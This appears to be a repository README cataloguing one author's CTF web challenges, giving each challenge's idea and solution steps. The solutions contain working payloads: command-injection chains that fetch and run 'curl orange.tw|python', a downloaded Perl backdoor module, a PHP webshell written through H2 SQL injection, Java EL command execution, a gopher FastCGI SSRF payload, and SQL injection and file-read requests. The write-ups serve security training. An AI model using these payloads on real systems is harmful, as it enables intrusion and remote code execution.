My CTF Web Challenges
This is the repo of CTF challenges I made, including the source code, write-up and idea explanation!
Hope you like it :)
P.s. BTW, Babyfirst series are my favorite in all challenges. If you don't have time to see all, please look the them at least!
You can contact me via:
Table of Content
One Line PHP Challenge
Difficulty: ★★★★
Solved: 3 / 1816
Tag: PHP
Source Code
Solution
P.S. This is a default installation PHP7.2 + Apache on Ubuntu 18.04
Control partial session file content by PHP_SESSION_UPLOAD_PROGRESS
Bypass session.upload_progress.cleanup = On by race condition or slow query
Control the prefix to @<?php by chaining PHP wrappers
Write Ups
Baby Cake
Difficulty: ★★★
Solved: 4 / 1816
Tag: Code Review, PHP, De-serialization
Source Code
Solution
Due to the implement of CURLOPT_SAFE_UPLOAD in CakePHP FormData.php. We can read arbitrary files!
# arbitrary file read, listen port 12345 on your server
http://13.230.134.135/
?url=http://your_ip:12345/
&data[x]=@/etc/passwd
# arbitrary de-serialization the Monolog POP chain
http://13.230.134.135/
?url=http://your_ip:12345/
&data[x]=@phar://../tmp/cache/mycache/[you_ip]/[md5_of_url]/body.cache
Write Ups
Oh My Raddit
Difficulty: ★★☆
Solved: 27 / 1816
Tag: Observation, DES checksum, Crypto, Web
Source Code
Solution
Know ECB mode from block frequency analysis
Know block size = 8 from cipher length
From the information above, it's reasonable to use DES in real world
The most common block is 3ca92540eb2d0a42(always in the cipher end). We can guess it's the padding \x08\x08\x08\x08\x08\x08\x08\x08
Due to the checking parity in DES, we can reduce the keyspace from 26(abcdefghijklmnopqrstuvwxyz) to 13(acegikmoqsuwy)
Break in 1 second with HashCat
Break in 10 minutes with single thread Python
Write Ups
Oh My Raddit v2
Difficulty: ★★
Solved: 10 / 1816
Tag: Web.py, SQL Injection to RCE
Source Code
Solution
Write Ups
Why so Serials?
Difficulty: ★★★★
Solved: 1 / 1816
Tag: De-serialization, RCE, ASP.NET, View State
Source Code
Solution
Get the machineKey in web.config by Server-Side-Includes(.shtml or .stm)
Exploit ASP.NET ___VIEWSTATE by ysoserial.net
Write Ups
BabyFirst Revenge
Difficulty: ★☆
Solved: 95 / 1541
Tag: WhiteBox, PHP, Command Injection
Idea
Command Injection, but only in 5 bytes
Source Code
Solution
# generate `ls -t>g` to file "_"
http://host/?cmd=>ls\
http://host/?cmd=ls>_
http://host/?cmd=>\ \
http://host/?cmd=>-t\
http://host/?cmd=>\>g
http://host/?cmd=ls>>_
# generate `curl orange.tw|python` to file "g"
http://host/?cmd=>on
http://host/?cmd=>th\
http://host/?cmd=>py\
http://host/?cmd=>\|\
http://host/?cmd=>tw\
http://host/?cmd=>e.\
http://host/?cmd=>ng\
http://host/?cmd=>ra\
http://host/?cmd=>o\
http://host/?cmd=>\ \
http://host/?cmd=>rl\
http://host/?cmd=>cu\
http://host/?cmd=sh _
# got shell
http://host/?cmd=sh g
You can check the exploit.py for the detail! And there are also lots of creative solutions, you can check the write ups below.
Write Ups
BabyFirst Revenge v2
Difficulty: ★★★★
Solved: 8 / 1541
Tag: WhiteBox, PHP, Command Injection
Idea
Command Injection, but only in 4 bytes
Source Code
Solution
generate g> ht- sl to file v
reverse file v to file x
generate curl orange.tw|python;
execute x, ls -th >g
execute g
You can check exploit.py for the detail!
Write Ups
SSRFme?
Difficulty: ★★☆
Solved: 20 / 1541
Tag: WhiteBox, Perl, PATH Pollution
Idea
CVE-2016-1238 (But the latest version of Ubuntu 17.04 in AWS is still vulnerable)
Perl lookup current directory in module importing
Perl module URI/lib/URI.pm#L136 will eval if there is a unknown scheme
Source Code
$sudoapt installlibwww-perl
Solution
# write evil URI module to current directory
$curl http://host/?filename=URI/orange.pm&url=http://orange.tw/w/backdoor.pl
# eval evil module `orange`
$curl http://host/?filename=xxx&url=orange://orange.tw
Write Ups
SQL so Hard
Difficulty: ★★★
Solved: 10 / 1541
Tag: WhiteBox, MySQL, PostgreSQL, SQL Injection, Code Injection
Idea
MySQL max_allowed_packet dropped large size SQL sentence
Exploit the RCE in SQL UPDATE syntax
Source Code
Solution
Write Ups
Baby^H Master PHP 2017
Difficulty: ★★★★☆
Solved: 0 / 1541
Tag: WhiteBox, PHP, Serialization, Apache Prefock
Idea
PHP do the de-serialization on PHAR parsing
PHP assigned a predictable function name \x00lambda_%d to an anonymous function
Break shared VARIABLE state in Apache Pre-fork mode
Source Code
Solution
# get a cookie
$curl http://host/ --cookie-jar cookie
# download .phar file from http://orange.tw/avatar.gif
$curl -b cookie 'http://host/?m=upload&url=http://orange.tw/'
# force apache to fork new process
$python fork.py &
# get flag
$curl -b cookie "http://host/?m=upload&url=phar:///var/www/data/$MD5_IP/&lucky=%00lambda_1"
Write Ups
papapa
Difficulty: ★
Solved: 71 / 1024
Tag: BlackBox, SSL, Pentesting
Idea
Leak the internal hostname from SSL certificate
Source Code
Solution
$openssl s_client -showcerts -connect 1.2.3.4:443 < /dev/null | openssl x509 -text | grep -A 1 "Subject Alternativer Name"
...
depth=0 C = TW, ST = Some-State, O = Internet Widgits Pty Ltd, CN = very-secret-area-for-ctf.orange.tw, emailAddress = orange@chroot.org
...
# get flag
$curl -k -H "host: very-secret-area-for-ctf.orange.tw" https://1.2.3.4/
Write Ups
Leaking
Difficulty: ★★
Solved: 43 / 1024
Tag: WhiteBox, JavaScript, NodeJS
Idea
Break JavaScript Sandbox
Use NodeJS Buffer(int) to steal uninitialized memory
Source Code
Solution
$whiletrue; docurl 'http://1.2.3.4/?data=Buffer(1e4)' | grep -a hitcon; done;
Write Ups
BabyTrick
Difficulty: ★★★
Solved: 24 / 1024
Tag: WhiteBox, PHP, MySQL, SQL Injection, Unserialize
Idea
Source Code
Solution
# get password
curl http://1.2.3.4/
?data=O:6:"HITCON":3:{s:14:"%00HITCON%00method";s:4:"show";s:12:"%00HITCON%00args";a:1:{i:0;s:39:"'union%20select%201,2,password%20from%20users%23";}}
# get flag
curl http://1.2.3.4/
?data=O:6:"HITCON":2:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{i:0;s:7:"orÄnge";i:1;s:13:"babytrick1234";}}
Write Ups
Angry Boy
Difficulty: ★★☆
Solved: 43 / 1024
Tag: GrayBox, Java
Idea
Source Code
Solution
Write Ups
Angry Seam
Difficulty: ★★★★
Solved: 4 / 1024
Tag: GrayBox, Java, Seam Framework, CSS RPO, EL Injection, Java Deserialization
Idea
CSS Relative Path Overwrite
Built-in redirection parameter actionOutcome
Source Code
Solution
P.s. I made this challenge because once when I try to review the code of Seam Framework, I found some 0-days and I think it must have more. So I throw out the brick to attract a jade. And the result is more than I expected :P
Intended solution
Register an account
username: `AAAAAA`
password: `AAAAAA`
realname: `{/*';*/}%0a@import'http://orange.tw/?`
Report URL
http://1.2.3.4:8080/angryseam/profile.seam?actionOutcom>e=/profile.seam?username%3dAAAAAA
Unintended solution
Register an account
Update description to
Login and access
/?x=#{expressions.instance().createValueExpression(request.getHeader('cmd')).getValue()}
GET /angryseam/template.seam?actionMethod=template.xhtml:util.escape(sessionScope['user'].getDescription()) HTTP/1.1
host: 1.2.3.4
cmd: #{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),request.getHeader('ccc'))}
ccc: ls -alh
...
Unintended solution
CVE-2013-2165 Java deserialization vulnerability
Unintended solution
SESSION manipulation... seam SUCKS
Write Ups
Babyfirst
Solved: 33 / 969
Difficulty: ★★
Tag: WhiteBox, PHP, Command Injection
Idea
Use NewLine to bypass regular expression check
Command injection only with alphanumeric characters
Source Code
highlight_file(__FILE__);
$dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];
if ( !file_exists($dir) )
mkdir($dir);
chdir($dir);
$args = $_GET['args'];
for ( $i=0; $i
if ( !preg_match('/^\w+$/', $args[$i]) )
exit();
}
exec("/bin/orange " . implode(" ", $args));
?>
Solution
http://localhost/
?args[0]=x%0a
&args[1]=mkdir
&args[2]=orange%0a
&args[3]=cd
&args[4]=orange%0a
&args[5]=wget
&args[6]=846465263%0a
http://localhost/
?args[0]=x%0a
&args[1]=tar
&args[2]=cvf
&args[3]=aa
&args[4]=orange%0a
&args[5]=php
&args[6]=aa
And there are also lots of creative solutions, you can check the write ups below.
Write Ups
nanana
Difficulty: ★★★
Solved: 18 / 969
Tag: GrayBox, C, PWN
Idea
Pwn without library
Format String without output
Bypass Stack Guard by using overflow ARGV[1]
Source Code
Solution
Write Ups
Giraffe's Coffee
Difficulty: ★★★☆
Solved: 16 / 969
Tag: WhiteBox, PHP
Idea
Break PHP PRNG
Break shared PRNG STATE in Apache Prefork mode
Source Code
Solution
TBD
Write Ups
lalala
Difficulty: ★★★☆
Solved: 2 / 969
Tag: BlackBox, PHP, SSRF
Idea
Bypass SSRF restrictiton with 302 redirect
Exploit FASTCGI protocol by using GOPHER
Source Code
Solution
header( "Location: gopher://127.0.0.1:9000/x%01%01Zh%00%08%00%00%00%01%00%00%00%00%00%00%01%04Zh%00%86%00%00%0E%03REQUEST_METHODGET%0F%0ASCRIPT_FILENAME/www/a.php%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%09%26PHP_VALUEauto_prepend_file%20%3D%20http%3A//orange.tw/x%01%04Zh%00%00%00%00%01%05Zh%00%00%00%00" );
Write Ups
Use-After-FLEE
Solved: 1 / 969
Difficulty: ★★★★☆
Tag: WhiteBox, PHP, UAF, PWN
Idea
Bypass open_basedir
Bypass disable_functions
PHP use-after-free exploit writing
Bypass full protection (DEP / ASLR / PIE / FULL RELRO)
Source Code
Solution
TBD
Write Ups
PUSHIN CAT
Solved: 8 / 1020
Difficulty: ★★
Platform: BlackBox, PHP, H2, SQL Injection
Idea
SQL Injection on H2 Database
Execute Code by using H2 SQL Injection
Source Code
Solution
TBD
Write Ups
PY4H4SHER
Solved: 30 / 1020
Difficulty: ★★☆
Tag: WhiteBox, Python, Collision, HPP
Idea
Python CGI HTTP Pollution
MySQL old_password hash collisions
Source Code
Solution
TBD
Write Ups
LEENODE
Solved: 2 / 1020
Difficulty: ★★★
Tag: BlackBox, ColdFusion, Apache
Idea
Multilayered architecture vulnerability
Double Encoding
Source Code
Solution
# get password
$curl http://1.2.3.4/admin%252f%252ehtpasswd%2500.cfm
# get flag
$curl http://1.2.3.4/admin/thefl4g.txt
Write Ups
BlackBox
Solved: 0 / 12
Difficulty: ★★★★
Tag: GrayBox, PHP, JAVA, mod_jk, H2, SQL Injection, WAF
Idea
Multilayered architecture vulnerability
Default and up to date mod_jk leads to directory travesal
Bypass WAF by incorrect usage of BASE64 and URLENCODE
SQL Injection on H2 Database
Execute Code by using H2 SQL Injection
Source Code
Solution
Get source code
http://1.2.3.4/login/..;/
Review code and find a way to bypass WAF
$curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,version(),null--"
$curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_read('/etc/apache2/sites-enabled/000-default.conf'),null--"
Write shell
$curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_write('3c3f706870206576616c28245f504f53545b6363635d293b3f3e', '/www/write_shell_here_=P/.a.php'),null--"
$curl "http://1.2.3.4/write_shell_here_=P/.a.php" -d 'phpinfo();'
Write Ups
TBD
SQLPWN
Solved: 0 / ??
Difficulty: ★★★
Tag: WhiteBox, PHP, SQL Injection, LFI, Race Condition
Idea
One-byte off SQL Injection
Race Condition
Local file inclusion with PHP session
Source Code
Solution
Run exploit.py to win race condition
Login and SQL Injection
$curl http://1.2.3.4/sqlpwn.php -d 'title=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\¬e=, concat(0x3a3a3a3a3a3a,(select pass from users where name=0x6f72616e6765)))#'
Local file inclusion with session
$curl http://1.2.3.4/sqlpwn.php?mode=admin&boom=../../../../../../var/lib/php5/sess_243220
Write Ups